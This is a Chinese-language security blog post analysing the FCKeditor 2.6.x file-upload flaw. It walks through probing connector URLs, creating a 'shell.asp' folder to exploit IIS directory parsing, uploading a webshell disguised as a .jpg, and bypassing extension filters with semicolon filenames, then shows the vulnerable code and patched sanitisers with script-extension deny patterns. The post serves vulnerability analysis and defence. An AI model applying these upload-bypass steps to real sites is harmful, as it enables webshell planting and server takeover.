• Fckeditor PHP/ASP File Upload Vul

    目录

    1. 漏洞描述
2. 漏洞触发条件
3. 漏洞影响范围
4. 漏洞代码分析
5. 防御方法
6. 攻防思考

    1. 漏洞描述

    FCKeditor是目前最优秀的可见即可得网页编辑器之一,它采用JavaScript编写。具备功能强大、配置容易、跨浏览器、支持多种编程语言、开源等特点。它非常流行,互联网上很容易找到相关技术文档,国内许多WEB项目和大型网站均采用了FCKeditor
    它可和PHP、JavaScript、ASP、ASP.NET、ColdFusion、Java、以及ABAP等不同的编程语言相结合
    FCK中一个很重要的文件上传的功能,常常被黑客用来进行GETSHELL攻击,根本原因是因为角色权限控制不严、以及文件扩展名限制逻辑存在BYPASS缺陷

    Relevant Link:

    http://sebug.net/vuldb/ssvid-20830


    2. 漏洞触发条件

    0x1: 信息搜集

    首先收集FCK的版本信息

    http://localhost/fckeditor/editor/dialog/fck_about.html
/*
version 
2.6.8
Build 25427
*/

    0x2: 获取上传点路径

    爆物理路径
http://172.31.200.74/editor/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp

1. 爆路径漏洞
http://192.168.174.138/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp

2. 列目录漏洞也可助找上传地址
http://192.168.174.138/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp

http://192.168.174.138/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F

3. 其他上传地址
http://192.168.174.138/fckeditor/_samples/default.html
http://192.168.174.138/fckeditor/_samples/asp/sample01.asp
http://192.168.174.138/fckeditor/_samples/asp/sample02.asp
http://192.168.174.138/fckeditor/_samples/asp/sample03.asp
http://192.168.174.138/fckeditor/_samples/asp/sample04.asp
一般很多站点都已删除_samples目录,可以试试。
FCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页
http://192.168.174.138/fckeditor/editor/fckeditor.html

4. 常用上传地址
http://192.168.174.138/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
http://192.168.174.138/fckeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
http://192.168.174.138/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php  

5. FCKeditor 中test 文件的上传地址
http://192.168.174.138/fckeditor/editor/filemanager/browser/default/connectors/test.html
http://192.168.174.138/fckeditor/editor/filemanager/upload/test.html
http://192.168.174.138/fckeditor/editor/filemanager/connectors/test.html
http://192.168.174.138/fckeditor/editor/filemanager/connectors/uploadtest.html

    最终获得的上传点如下

    http://localhost/fckeditor/editor/filemanager/connectors/test.html
http://localhost/fckeditor/editor/filemanager/connectors/uploadtest.html

    0x3: 建立新文件夹

    http://localhost/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
//在images文件夹下建立文件夹

    0x4: IIS解析漏洞

    如果你的文件处在一个xx.asp文件夹下,那这个文件夹下的所有文件都会被当作.asp脚本来执行,这是利用了IIS的xx.asp文件夹解析漏洞

    1. 建立一个文件夹/z/shell.asp
http://localhost/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684 
http://localhost/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp

2. 上传一个内容为WEBSHELL的xx.jpg文件
http://localhost/userfiles/image/shell.asp/z/choop.jpg
http://localhost/userfiles/image/shell.asp/z/choop.jpg
//这个xx.jpg会被当作webshell解析

    0x5: FCK扩展名过滤防御解析漏洞

    正常情况下,fck对上传的文件后缀扩展名是有防御逻辑的(即禁止上传脚本文件)

    1. 上传文件名: shell.php;.jpg
文件会被重命名为: shell_php.jpg

2. 如果上传文件名: 
    1) a.php;a_jpg
    2) a.asp;a_jpg
则文件不会被重命名
 
3. 又因为IIS存在一个解析漏洞,分号";"后面的字符串会被IIS截断,导致黑客上传的文件对IIS来说就是
a.php
a.asp
从而得到执行

    Relevant Link:

    http://hi.baidu.com/holyli/item/f2d37959513ed509e6c4a597


    3. 漏洞影响范围

    2.6.xx


    4. 漏洞代码分析

    FCKEditor上传检测,是通过黑色单/白名单的方式检测允许和不允许上传的文件类型,具体的实现逻辑位于

    1. asp: editorfilemanagerconnectorsaspio.asp
2. php: editorfilemanagerconnectorsphpio.php
//在另一个browser目录中也存在同样目录结构的一套文件
3. asp: editorfilemanagerrowserdefaultconnectorsaspio.asp
4. php: editorfilemanagerrowserdefaultconnectorsphpio.php

    0x1: ASP

    fckeditoreditorfilemanagerconnectorsaspclass_upload.asp

    Private Function IsAllowed(sExt)
        Dim oRE
        Set oRE    = New RegExp
        oRE.IgnoreCase    = True
        oRE.Global        = True

        If sDenied = "" Then
            oRE.Pattern    = sAllowed
            IsAllowed    = (sAllowed = "") Or oRE.Test(sExt)
        Else
            oRE.Pattern    = sDenied
            IsAllowed    = Not oRE.Test(sExt)
        End If

        Set oRE    = Nothing
End Function

    fckeditoreditorfilemanagerconnectorsaspio.asp

    Function IsAllowedExt( extension, resourceType )
    Dim oRE
    Set oRE    = New RegExp
    oRE.IgnoreCase    = True
    oRE.Global        = True

    Dim sAllowed, sDenied
    sAllowed    = ConfigAllowedExtensions.Item( resourceType )
    sDenied        = ConfigDeniedExtensions.Item( resourceType )

    IsAllowedExt = True

    If sDenied <> "" Then
        oRE.Pattern    = sDenied
        IsAllowedExt    = Not oRE.Test( extension )
    End If

    If IsAllowedExt And sAllowed <> "" Then
        oRE.Pattern        = sAllowed
        IsAllowedExt    = oRE.Test( extension )
    End If

    Set oRE    = Nothing
End Function

    待检测的extension是来自FCK的配置文件:config.asp
    fckeditoreditorfilemanagerconnectorsaspconfig.asp

    ConfigAllowedExtensions.Add    "File", "7z|aiff|asf|avi|bmp|csv|doc|fla|flv|gif|gz|gzip|jpeg|jpg|mid|mov|mp3|mp4|mpc|mpeg|mpg|ods|odt|pdf|png|ppt|pxd|qt|ram|rar|rm|rmi|rmvb|rtf|sdc|sitd|swf|sxc|sxw|tar|tgz|tif|tiff|txt|vsd|wav|wma|wmv|xls|xml|zip"

ConfigAllowedExtensions.Add    "Image", "bmp|gif|jpeg|jpg|png"

ConfigAllowedExtensions.Add    "Flash", "swf|flv"

ConfigAllowedExtensions.Add    "Media", "aiff|asf|avi|bmp|fla|flv|gif|jpeg|jpg|mid|mov|mp3|mp4|mpc|mpeg|mpg|png|qt|ram|rm|rmi|rmvb|swf|tif|tiff|wav|wma|wmv"

    这只是提供给FCK的正则判断逻辑,真正的重命名机制在这里
    fckeditoreditorfilemanagerconnectorsaspio.asp

    ' Do a cleanup of the file name to avoid possible problems
function SanitizeFileName( sNewFileName )
    Dim oRegex
    Set oRegex = New RegExp
    oRegex.Global        = True

    if ( ConfigForceSingleExtension = True ) then
        /*
        这就是重命名文件名的关键逻辑了
        从第一个遇到"."号开始搜索,并把后面的内容当作捕获分组,捕获分组的过滤条件是不会再在后面遇到一个"."号 了,并设置一个断言,断言的内容为捕获分组的内容不可能发生,即如果还在后面遇到了一个"."号,则这个正则判断成立,即搜索到第一次遇到的"."号。然后进行replace操作,把"."号替换成"_"
        1. 如果我们的文件名是: asp.asp;asp.jpg,自然会被正则捕获到,第一个"."号就被替换成了"_"
        2. 如果我们的文件名是: asp.asp;jpg,这种文件名也能通过文件后缀判断逻辑,即bypass
        */
        oRegex.Pattern = ".(?![^.]*$)"
        sNewFileName = oRegex.Replace( sNewFileName, "_" )
    end if

' remove  / | : ? *  " < > and control characters
    oRegex.Pattern = "(\|/|||:|?|*|""|<|>|[u0000-u001F]|u007F)"
    SanitizeFileName = oRegex.Replace( sNewFileName, "_" )

    Set oRegex = Nothing
end function


    5. 防御方法

    1. ASP

    0x1:  删除fckeditor下含test的html文件

    1. editorfilemanagerconnectors	est.html

    0x2: 在代码层防御IIS解析漏洞(分号截断)

    editorfilemanagerconnectorsaspio.asp

    ' Do a cleanup of the file name to avoid possible problems
function SanitizeFileName( sNewFileName )
    Dim oRegex
    Dim oRegexSecurityExt
    Set oRegex                 = New RegExp
    Set oRegexSecurityExt     = New RegExp
    oRegex.Global                    = True
    oRegexSecurityExt.Global        = True

    if ( ConfigForceSingleExtension = True ) then
        oRegex.Pattern = ".(?![^.]*$)"
        SanitizeFileName = oRegex.Replace( sNewFileName, "_" )

        oRegexSecurityExt.Pattern = ".(asp|aspx|cer|asa|hdx|cdx|php|php5|php4|php3|phtml|shtml|jsp|jspx|xsp|cfm)(;|$)"
        SanitizeFileName = oRegexSecurityExt.Replace( sNewFileName, "_" )
    end if

' remove  / | : ? *  " < > and control characters
    oRegex.Pattern = "(\|/|||:|;|?|*|""|<|>|[u0000-u001F]|u007F)"
    SanitizeFileName = oRegex.Replace( sNewFileName, "_" )

    Set oRegex = Nothing
end function

    0x3: 在代码层防御IIS解析漏洞(创建xx.asp目录)
    如果黑客通过FCK的目录创建接口创建了一个xx.asp目录,IIS将此目录下的的任意文件都当作asp脚本进行解析,攻击者可以向这个目录下上传包含WEBSHELL的jpg文件

    ' Do a cleanup of the folder name to avoid possible problems
function SanitizeFolderName( sNewFolderName )
    Dim oRegex
    Dim oRegexSecurityExt
    Set oRegex                 = New RegExp
    Set oRegexSecurityExt     = New RegExp
    oRegex.Global                    = True
    oRegexSecurityExt.Global        = True

    'remove .  / | : ? *  " < > and control characters
    oRegex.Pattern = "(.|\|/|||:|?|;|*|""|<|>|[u0000-u001F]|u007F)"
    SanitizeFolderName = oRegex.Replace( sNewFolderName, "_" )

    'forbidden the dangerous ext
    oRegexSecurityExt.Pattern = ".(asp|aspx|cer|asa|hdx|cdx|php|php5|php4|php3|phtml|shtml|jsp|jspx|xsp|cfm)$"
    SanitizeFolderName = oRegexSecurityExt.Replace( sNewFolderName, "_" )

    Set oRegex = Nothing
end function

    0x4: 扩展名上传限制正则绕过漏洞

    和0x2: 在代码层防御IIS解析漏洞(分号截断)相同,同时还可以通过强化正则规则,在扩展名的头尾加上"起始"、"结束"定界符来规避攻击者的畸形后缀bypass

    Function IsAllowedType( resourceType )
    Dim oRE
    Set oRE    = New RegExp
    oRE.IgnoreCase    = False
    oRE.Global        = True
    oRE.Pattern        = "^(" & ConfigAllowedTypes & ")$"

    IsAllowedType = oRE.Test( resourceType )

    Set oRE    = Nothing
End Function

Function IsAllowedCommand( sCommand )
    Dim oRE
    Set oRE    = New RegExp
    oRE.IgnoreCase    = True
    oRE.Global        = True
    oRE.Pattern        = "^(" & ConfigAllowedCommands & ")$"

    IsAllowedCommand = oRE.Test( sCommand )

    Set oRE    = Nothing
End Function

    Relevant Link:

    http://www.chinaz.com/news/2012/1205/284700.shtml
http://www.sdlunzhong.cn/itres/showitnews.aspx?id=807

    2. PHP

    存在IIS+FastCGI即同时存在ASP、PHP的运行环境

    /editor/filemanager/connectors/php/io.php

    // Do a cleanup of the folder name to avoid possible problems
function SanitizeFolderName( $sNewFolderName )
{
    $sNewFolderName = stripslashes( $sNewFolderName ) ;

    // Remove .  / | : ; . ? * " < >
    $sNewFolderName = preg_replace( '/\.|\\|\;|\/|\||\:|\?|\*|"|<|>|[[:cntrl:]]/', '_', $sNewFolderName ) ;

    $sNewFolderName = preg_replace( '/\.(asp|aspx|cer|asa|hdx|cdx|php|php5|php4|php3|phtml|shtml|jsp|jspx|xsp|cfm)$/i', '_', $sNewFolderName ) ;

    return $sNewFolderName ;
}

// Do a cleanup of the file name to avoid possible problems
function SanitizeFileName( $sNewFileName )
{
    global $Config ;

    $sNewFileName = stripslashes( $sNewFileName ) ;

    // Replace dots in the name with underscores (only one dot can be there... security issue).
    if ( $Config['ForceSingleExtension'] )
        $sNewFileName = preg_replace( '/\.(?![^.]*$)/', '_', $sNewFileName ) ;

    // Remove  / | : ? * " < >
    $sNewFileName = preg_replace( '/\\|\/|\||\:|\;|\?|\*|"|<|>|[[:cntrl:]]/', '_', $sNewFileName ) ;

    $sNewFileName = preg_replace( '/\.(asp|aspx|cer|asa|hdx|cdx|php|php5|php4|php3|phtml|shtml|jsp|jspx|xsp|cfm)(;|$)/i', '_', $sNewFileName ) ;

    return $sNewFileName ;
}


    6. 攻防思考

    Copyright (c) 2014 LittleHann All rights reserved
  • 相关阅读:
    当下流行的分布式文件系统大阅兵
    smb相关资料
    Linux下将多个静态库(.a)合并成一个静态库文件(.a)的命令操作,方法一
    IBInspectable的使用
    iOS开发拓展篇——如何把项目托管到GitHub
    iOS开发拓展篇-XMPP简单介绍
    iOS开发拓展篇—应用之间的跳转和数据传递
    使用NSURLSession获取网络数据和下载文件
    李洪强实现横向滚动的View<二>
    李洪强实现横向滚动的View<一>
  • 原文地址:https://www.cnblogs.com/LittleHann/p/4323968.html
Copyright © 2020-2023  润新知